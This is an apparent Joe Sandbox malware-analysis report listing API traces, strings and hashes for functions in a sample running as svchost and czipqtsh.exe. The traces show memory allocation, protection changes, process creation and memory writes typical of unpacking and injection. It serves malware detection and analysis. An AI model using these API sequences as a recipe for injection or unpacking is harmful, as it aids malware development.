Function 02B127E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02B127F9
CreateProcessW.KERNEL32(00000000,02B162F0,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 02B12825
ExitProcess.KERNEL32 ref: 02B1282C

Strings

D, xrefs: 02B12800

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Process$CreateExitmemset
String ID: D
API String ID: 2480966106-2746444292
Opcode ID: b0d8d36e464c40b42930303eaad36e1a3d9ace38506102732a26f053c382f7a8
Instruction ID: 0cf8f2002f96b83e71d03633bfd3ccf0b96b78191bddb660179ed0e512beba2a
Opcode Fuzzy Hash: b0d8d36e464c40b42930303eaad36e1a3d9ace38506102732a26f053c382f7a8
Instruction Fuzzy Hash: 03E0C9B184064C7EE7409AF8CD89EABB7ACAB48744F400825B706E6050DA789A1C8A66

Uniqueness

Uniqueness Score: -1.00%

Function 02B15208 Relevance: 6.4, APIs: 5, Instructions: 114memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B1525E
Sleep.KERNEL32(00001388), ref: 02B15271
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B1528A
GetProcessHeap.KERNEL32(00000000,?), ref: 02B15327
GetProcessHeap.KERNEL32(00000000,?), ref: 02B15333

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: HeapProcess$Sleep
String ID:
API String ID: 1699386916-0
Opcode ID: da4ceaf2f95342cce8af8dabd16d2a788934be72c169ddd1a890227dc887e985
Instruction ID: 1e99f7379a00320a5fcb2aed53f5b553d136e160dab85afeeda410346438be22
Opcode Fuzzy Hash: da4ceaf2f95342cce8af8dabd16d2a788934be72c169ddd1a890227dc887e985
Instruction Fuzzy Hash: 0241CB725083009BC724DFA4D848B6BB7E8EB88319FC40E9DF59693180DB74D658CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02B15B4F Relevance: 6.1, APIs: 4, Instructions: 89registrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?), ref: 02B15B64

Part of subcall function 02B12F1A: CryptAcquireContextW.ADVAPI32(02B17658,00000000,00000000,00000001,F0000000,02B162B0,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F35
Part of subcall function 02B12F1A: CryptCreateHash.ADVAPI32(02B17658,00008003,00000000,00000000,?,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F52
Part of subcall function 02B12F1A: CryptHashData.ADVAPI32(?,02B17658,?,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F68
Part of subcall function 02B12F1A: CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12F83
Part of subcall function 02B12F1A: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02B15B88,?,00000000,?), ref: 02B12FA3
Part of subcall function 02B12F1A: CryptDestroyHash.ADVAPI32(?,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12FB3
Part of subcall function 02B12F1A: CryptReleaseContext.ADVAPI32(02B17658,00000000,?,?,?,02B15B88,?,00000000,?,?,02B17658,?), ref: 02B12FC2

Part of subcall function 02B144D2: wsprintfA.USER32 ref: 02B14509

RegDeleteKeyA.ADVAPI32(80000001,?), ref: 02B15BF4

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDeleteDestroyParamReleaselstrlenwsprintf
String ID:
API String ID: 1772175150-0
Opcode ID: a0ba865b3f4f27ad33ffc7ce9acc8d24fb8aab26befa87aa44f836b0e643d893
Instruction ID: 09120a95b7bf2b8b0390d940fd67d6b19ed56913ed4e263ec5bba60d86b14b00
Opcode Fuzzy Hash: a0ba865b3f4f27ad33ffc7ce9acc8d24fb8aab26befa87aa44f836b0e643d893
Instruction Fuzzy Hash: BA21B1724442489FDB21DFA8DC94AEEBBACEB45350F940596F915D7101DB21D185CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B13803 Relevance: 6.1, APIs: 4, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,00000000,?,00000000,02B13904,?,00000000,00000000,00000000,00000007,?,?), ref: 02B13855
RtlReAllocateHeap.NTDLL(00000000,?,00000000,02B13904), ref: 02B1385C

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: a1534a3fffca9e1094dc04a318eaa55f8e3a6128bcc0812598be2525c16719ab
Instruction ID: 0c2541869b7378a18ce11a485b8af5c87a9f836fed32a7e52c063db4b604cb6b
Opcode Fuzzy Hash: a1534a3fffca9e1094dc04a318eaa55f8e3a6128bcc0812598be2525c16719ab
Instruction Fuzzy Hash: E211BE72A003018FC7308F69D844B66B7E9EF85644F5848EDE5D2C7204EB30F482CB20

Uniqueness

Uniqueness Score: -1.00%

Function 02B1540D Relevance: 6.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 02B1542D
RtlAllocateHeap.NTDLL(00000000), ref: 02B15434
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B15496
HeapFree.KERNEL32(00000000), ref: 02B1549D

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 0cfb338ff3656d82609873e7dbf283c01a2fe7e21b57ff829f481546adfa0f3f
Instruction ID: 474d1f15ac732e16aebcde9120da7e61742febe56df634038c9ad025a4e6c3ea
Opcode Fuzzy Hash: 0cfb338ff3656d82609873e7dbf283c01a2fe7e21b57ff829f481546adfa0f3f
Instruction Fuzzy Hash: 871106779002046BCB209EB99C49EA7B76DEBC9652FC845A5FE49D7108DB30D85487B0

Uniqueness

Uniqueness Score: -1.00%

Function 02B14AA7 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000), ref: 02B14AD7
RtlAllocateHeap.NTDLL(00000000), ref: 02B14ADE
GetProcessHeap.KERNEL32(00000008,0000056E,?,?,?,?,?), ref: 02B14B0A
RtlAllocateHeap.NTDLL(00000000), ref: 02B14B11

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: cb6f014e2eca9b8b211970da7ab7df897b768f34fbe7aebc2f4478c5e1334bcd
Instruction ID: f4e8c0913004c0b2dbacceda5416f339554de1bd658cfbe84d140c6ce7327048
Opcode Fuzzy Hash: cb6f014e2eca9b8b211970da7ab7df897b768f34fbe7aebc2f4478c5e1334bcd
Instruction Fuzzy Hash: 5F115A75A50B02EBEB619F74DC05B13B7F4EB04344F4889A9F696C61A4EB31D450DB14

Uniqueness

Uniqueness Score: -1.00%

Function 02B11496 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B114DF
HeapFree.KERNEL32(00000000), ref: 02B114E6

Strings

!, xrefs: 02B114A3
!, xrefs: 02B114C6

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID: !$!
API String ID: 3859560861-2068775997
Opcode ID: 2db84efe2951edac3ca3eae31113d05e09672012ddfbb242db735958d558763f
Instruction ID: 928e2ffd0e308cf19ded68af672ec4eb05bc1d8a5ff6606d2c916b670cf38f17
Opcode Fuzzy Hash: 2db84efe2951edac3ca3eae31113d05e09672012ddfbb242db735958d558763f
Instruction Fuzzy Hash: C1F062726642156EFB105A6CDC0ABF67B9DDB05A90F884451FE09C6280EA61D9909A90

Uniqueness

Uniqueness Score: -1.00%

Function 02B125E3 Relevance: 6.0, APIs: 4, Instructions: 40stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(?,02B17328), ref: 02B125F6
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02B12612
CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02B12623
GetLastError.KERNEL32 ref: 02B1262D

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: CreateEvent$ErrorLastlstrcpy
String ID:
API String ID: 1615007319-0
Opcode ID: 77773921c5dcd27745d094217d385306f2b580aaacdea075e98a3de617187c1c
Instruction ID: 230900df46803b55887824384b7f56b03e9e7bee6ec2ef675f95090069d39c54
Opcode Fuzzy Hash: 77773921c5dcd27745d094217d385306f2b580aaacdea075e98a3de617187c1c
Instruction Fuzzy Hash: 7DF03031A44249ABE72056B6AC4DEAFBBBCEBC5B45F80406EF805C3140EF259815DB71

Uniqueness

Uniqueness Score: -1.00%

Function 02B149EE Relevance: 5.1, APIs: 4, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000), ref: 02B14A7A
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000,?,?,?), ref: 02B14A81
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000), ref: 02B14A92
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,02B14F4C,?,00000000,?,?,?), ref: 02B14A99

Part of subcall function 02B14B3F: lstrcpy.KERNEL32(-00000469,?), ref: 02B14C69

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess$lstrcpy
String ID:
API String ID: 25539217-0
Opcode ID: 69df870ed0ec45d7881b0e305968e7bb9ca33833abb61b4ec21ed2f39eaa9e4f
Instruction ID: 8b44bf8d685ff7067e7195489649889f4ead065775f06140c9d178de2c2043bc
Opcode Fuzzy Hash: 69df870ed0ec45d7881b0e305968e7bb9ca33833abb61b4ec21ed2f39eaa9e4f
Instruction Fuzzy Hash: 402147768083169FC310DFA4D84494BBBE8FB88394F954A5EF989D7200EB30DA449B86

Uniqueness

Uniqueness Score: -1.00%

Function 02B1136A Relevance: 5.1, APIs: 4, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B113EC
HeapFree.KERNEL32(00000000), ref: 02B113F3

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: ac96e13add8fbbca9f92f447f85b52bbdea2588de4456ddddad911ae7ff2a9ab
Instruction ID: 9c8d0beed5ae9a700e18e04faee87f35bf90d8d68bb2701c0b0d5c49139c46f6
Opcode Fuzzy Hash: ac96e13add8fbbca9f92f447f85b52bbdea2588de4456ddddad911ae7ff2a9ab
Instruction Fuzzy Hash: ED1151B6D10209BBDF10DFE99848BDFBBBCEB48251F9044A5E708E3104EB3086508BB1

Uniqueness

Uniqueness Score: -1.00%

Function 02B11404 Relevance: 5.1, APIs: 4, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02B1146A
HeapFree.KERNEL32(00000000), ref: 02B11471
GetProcessHeap.KERNEL32(00000000,?), ref: 02B1147E
HeapFree.KERNEL32(00000000), ref: 02B11485

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a2309c7c920ce05370309539dca60a9a8f7d66b103e87be25d7a5904f31198ce
Instruction ID: dbee7a48bcb8f7f12e527153a9bcafb7ae8bd335457770e3571895676bc480b6
Opcode Fuzzy Hash: a2309c7c920ce05370309539dca60a9a8f7d66b103e87be25d7a5904f31198ce
Instruction Fuzzy Hash: 42115471D10209ABCB00DFE98849BDEFBBCEF09754F9444A6E608E3100D77095548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02B11F56 Relevance: 5.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 02B11CD5: GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02B11CFD
Part of subcall function 02B11CD5: RtlAllocateHeap.NTDLL(00000000), ref: 02B11D04
Part of subcall function 02B11CD5: lstrcpy.KERNEL32(00000000,00000000), ref: 02B11D2D
Part of subcall function 02B11CD5: GetProcessHeap.KERNEL32(00000000,?), ref: 02B11DF6
Part of subcall function 02B11CD5: HeapFree.KERNEL32(00000000), ref: 02B11DFD
Part of subcall function 02B11CD5: Sleep.KERNEL32(00001388), ref: 02B11E08

GetProcessHeap.KERNEL32(00000000,?), ref: 02B11FB4
HeapFree.KERNEL32(00000000), ref: 02B11FBB
GetProcessHeap.KERNEL32(00000000,?), ref: 02B11FC3
HeapFree.KERNEL32(00000000), ref: 02B11FCA

Memory Dump Source

Source File: 0000001A.00000002.3295811054.0000000002B11000.00000020.00000400.00020000.00000000.sdmp, Offset: 02B11000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2b11000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpy
String ID:
API String ID: 1268735806-0
Opcode ID: a9a179a4650e0004744aabd203adb290b492c10a7b7c2f602744e9452a76e923
Instruction ID: 5f6e5972f56dd25f1b6572494e262a3545f444cda4107a103baf500aa689aa25
Opcode Fuzzy Hash: a9a179a4650e0004744aabd203adb290b492c10a7b7c2f602744e9452a76e923
Instruction Fuzzy Hash: 0601A5B1808305AFC710DFA6D848A5BBBE8FB4C254F44491EF699D3200EB35E6549F96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: czipqtsh.exePID: 2904, Parent PID: 1088COMMON

Executed Functions

Function 004010CF Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 75
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringA.KERNEL32(fail 3), ref: 004010EE
NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00401122
OutputDebugStringA.KERNEL32(fail 2), ref: 00401133

Strings

fail 3, xrefs: 004010E9
Start, xrefs: 00401167
Stop ok, xrefs: 00401180
fail 1, xrefs: 0040114E
Stop Err, xrefs: 00401187
fail 2, xrefs: 0040112E

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: DebugOutputString$CreateProcessUser
String ID: Start$Stop Err$Stop ok$fail 1$fail 2$fail 3
API String ID: 976970837-1310772363
Opcode ID: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction ID: 243eedd8a4f49eb320fdfb0d7e1e77221009fbf540129bad84db16ccdf4411bb
Opcode Fuzzy Hash: f498b5b8b7e85bdb1976bf98945623132273431d24ab6f40ffb868399b8cd4d0
Instruction Fuzzy Hash: 1421CA32605209BBCB055F94DD01E9A3F29EB0C725B214237FE00B61F4DA7AC960AB99

Uniqueness

Uniqueness Score: -1.00%

Function 020904F4 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,00000992,00003000,00000040,00000992,02090000), ref: 020905D8
VirtualAlloc.KERNELBASE(00000000,000001A9,00003000,00000040,0209003A), ref: 0209060F
VirtualAlloc.KERNELBASE(00000000,0000B2A2,00003000,00000040), ref: 0209066F
VirtualFree.KERNELBASE(020B0000,00000000,00008000), ref: 020906A5
VirtualProtect.KERNELBASE(00400000,00009000,00000004,020904CF), ref: 020907B4
VirtualProtect.KERNEL32(00400000,00001000,00000004,020904CF), ref: 020907DB

Part of subcall function 020903A1: LoadLibraryExA.KERNELBASE(?,00000000,00000000,?), ref: 020903DA

VirtualProtect.KERNELBASE(00400000,?,00000002,020904CF), ref: 020908A1
VirtualProtect.KERNELBASE(00400000,?,00000002,020904CF,?), ref: 020908F7
VirtualFree.KERNELBASE(020B0000,00000000,00008000), ref: 0209091B

Memory Dump Source

Source File: 0000001B.00000002.2951158007.0000000002090000.00000040.00001000.00020000.00000000.sdmp, Offset: 02090000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2090000_czipqtsh.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free$LibraryLoad
String ID:
API String ID: 1732388798-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 31a9f0b52f93f73356efc9674a42cce369bc873aea5879f07b60c7ae1f66a93b
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 33D17D727002019FEF11EF54CC80F5277A6FF64714B890294ED0E9F66ADB70A921EB68

Uniqueness

Uniqueness Score: -1.00%

Function 00422152 Relevance: 13.8, APIs: 9, Instructions: 331
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00000992,00003000,00000040,00000992,00421C5E), ref: 00422236
VirtualAlloc.KERNEL32(00000000,000001A9,00003000,00000040,00421C98), ref: 0042226D
VirtualAlloc.KERNEL32(00000000,0000B2A2,00003000,00000040), ref: 004222CD
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422303
VirtualProtect.KERNEL32(00400000,00000000,00000004,0042212D), ref: 00422412
VirtualProtect.KERNEL32(00400000,00001000,00000004,0042212D), ref: 00422439
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D), ref: 004224FF
VirtualProtect.KERNEL32(00000000,?,00000002,0042212D,?), ref: 00422555
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00422579

Memory Dump Source

Source File: 0000001B.00000002.2950764086.0000000000421000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00421000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_421000_czipqtsh.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction ID: 825025660836190913fdd1bb514e6233e9fadebdfec7ebde24a9587a44909d83
Opcode Fuzzy Hash: a21c1fcf7313ad9f5ce9639c566054cbe9b701e99c7aabe4d0652ff718d7e89c
Instruction Fuzzy Hash: 2FD19E72700100AFEB14EF54CD80F6277A6FF68310B890295ED0D9F26ADB74A921CB6C

Uniqueness

Uniqueness Score: -1.00%

Function 004015BE Relevance: 1.5, APIs: 1, Instructions: 20
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,75539350,00003000,00000004), ref: 004015DB

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction ID: 5f65e376ed05142d156b79c11863de9d8c1410112659dc892d0819c29325736b
Opcode Fuzzy Hash: c89adba908ca871be9ce827485f4956cce24457d38a3e40d239f8f1f7eb3a445
Instruction Fuzzy Hash: 71E0EC7556020CBBEF01CF90DD46FE977BCEB00715F104150B904D6090D775AB149B95

Uniqueness

Uniqueness Score: -1.00%

Function 0040160F Relevance: 1.5, APIs: 1, Instructions: 16
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWriteVirtualMemory.NTDLL(00401692,00000000,00000000,?,?), ref: 00401623

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction ID: 5a808b04aabe2117a938e4500ca1c1b9b1ef177e0b005ac0e652288855810eb1
Opcode Fuzzy Hash: dd962de9b64438870b2894e6f6e0c6ee5c7c009fcec118a3b940f06222a4811c
Instruction Fuzzy Hash: 78D0C93255410DBFCF029FA4DD05CAA7B6EFB09211B004665FE29D2060D6329A34AB91

Uniqueness

Uniqueness Score: -1.00%

Function 004015EE Relevance: 1.5, APIs: 1, Instructions: 15
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(00000044,?,00000010,?,004010CF), ref: 00401602

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction ID: 2a43cff2ce15a73ccafebcd56fae5865f2d1f9501d48921ddcbb68ebc334f4a9
Opcode Fuzzy Hash: 4da293ee12ca45bf45e600fb64d5736a10573e54717f0195352ef75157bb5ffd
Instruction Fuzzy Hash: C1D0C93205410EBFDF019FA0DD05CEA3B6DEB05255B004121FA19D1060E632D6699B90

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 70
sleepprocessstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCommandLineA.KERNEL32 ref: 0040100A
StrStrIA.KERNELBASE(00000000, /u), ref: 00401018
Sleep.KERNEL32(00001388), ref: 00401027
ExitProcess.KERNEL32 ref: 00401039
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040107F
SetCurrentDirectoryW.KERNEL32(?), ref: 0040108C
lstrcatW.KERNEL32(?,?), ref: 004010A7
CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 004010C3

Strings

/u, xrefs: 00401012

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: DirectoryProcess$CommandCreateCurrentExitLineSleepSystemlstrcat
String ID: /u
API String ID: 4042104365-4118749740
Opcode ID: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction ID: 96ee623e9da2e0af38eded0e061056f2ac1dfe5269435d034bd7705fbe78fb85
Opcode Fuzzy Hash: b747ae3141204b1c38ca21bc4f55e1c812c318ab8368f1fa781a2d1dd495982a
Instruction Fuzzy Hash: 36115472802619ABDB20AFB1DD0DEDE7B7CAF08705F10003AF605F20A5D63897458BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401CB5 Relevance: 3.0, APIs: 2, Instructions: 8
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,00000000,0040157D,00000000,00000000,00000000,?,530C1AEE,004020E8), ref: 00401CC2
RtlFreeHeap.NTDLL(00000000,?,530C1AEE,004020E8), ref: 00401CC9

Memory Dump Source

Source File: 0000001B.00000002.2950589703.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000001B.00000002.2950571942.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950609629.0000000000402000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950628830.0000000000403000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000001B.00000002.2950647024.0000000000404000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_400000_czipqtsh.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction ID: de2e74cc2c5d9c26438789ecc4f5efd00e9e3bcaa0604652a6375203050d3e1d
Opcode Fuzzy Hash: a17b4e92315cbfe38b156d6706c7fcabeb76f83999710892967727563ebf0b78
Instruction Fuzzy Hash: E3C04C31449240FBEF015F909B0CB0A7ABDAB84743F008468F149A11A486748944DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401C79 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

